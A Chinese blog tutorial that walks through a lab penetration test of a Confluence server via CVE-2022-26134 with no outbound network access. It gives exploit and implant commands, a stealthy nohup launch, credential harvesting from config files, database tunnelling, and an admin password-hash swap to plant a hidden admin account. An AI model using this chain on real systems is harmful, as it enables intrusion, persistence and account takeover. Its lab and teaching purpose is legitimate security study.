如何在不出网的环境下做好渗透测试?网络安全零基础入门到精通实战教程

提要

本次模拟不出网环境下的渗透测试,靶机搭建了有CVE-2022-26134漏洞的confluence服务

confluence服务位于端口8090

用到的工具有vshell,suo5,哥斯拉,proxifier,navicat

靶机ip:10.10.10.135

攻击机:10.10.10.1

正式操作

首先我们上传带有CVE-2022-26134的内存马

E:\web\tools\ONE-FOX集成工具箱_V8.2公开版_by狐狸\Java_path\Java_8_win\bin\java.exe -jar CVE-2022-26134.jar http://10.10.10.135:8090/ pass key

哥斯拉连接成功后,利用suo5插件注入Suo5Filter马

img

注入成功后,我们就用suo5客户端连接

img

至此,我们的一层代理就搭好了

现在我们使用vshell生成正向监听器

img

下载成功后,我们利用哥斯拉上传文件到/var/tmp

然后在哥斯拉里的虚拟终端上赋权+nohup运行(nohup执行不留痕迹)

cd /var/tmp
chmod +x tcp_linux_amd64
nohup ./tcp_linux_amd64 > /dev/null 2>&1 &

img

然后查看内网ip

cat /etc/hosts
#172.18.0.3

img

然后我们就可以在vshell上建立正向连接了

img

成功连接

img

我们拥有了正向shell之后,我们可以在/var/atlassian/application-data/confluence/confluence.cfg.xml里看到数据库ip、账号、密码

img

账号密码postgres:postgres,但是数据库的ip被db顶替了,端口为5432,我们用curl查看

curl db -vv

img

可以看到数据库IP为172.18.0.2

然后我们现在可以搭建第二个代理来把数据库引出来

首先在vshell里创建隧道

img

然后我们启动proxifier设置一下

img

img

然后使用navicat连接

img

我们可以在confluence库里的cwd_user表里查看到管理员账号密码

img

由于confluence数据库密码使用的是 PBKDF2加密,我们先将此密码备份下来

{PKCS5S2}X1AmkpM26Jj50k/2GNBEHB2DfbvKTmoevf90yaWYgALYVarRZK1Bmv2XcdxjDvPR

然后我们将其替换成密码123456

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm

然后快速登录confluence

img

成功登陆后,我们快速创建新的管理员账号

img

然后退出admin账号,并将其密码修改成原来的密码

至此,渗透后利用就可以由此展开了。。。

总结

模拟靶机不出网的情况下,首先我们使用suo5代理出shell到vshell,然后再利用proxifier代理出数据库到本地navicat,再在此基础上进行操作

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值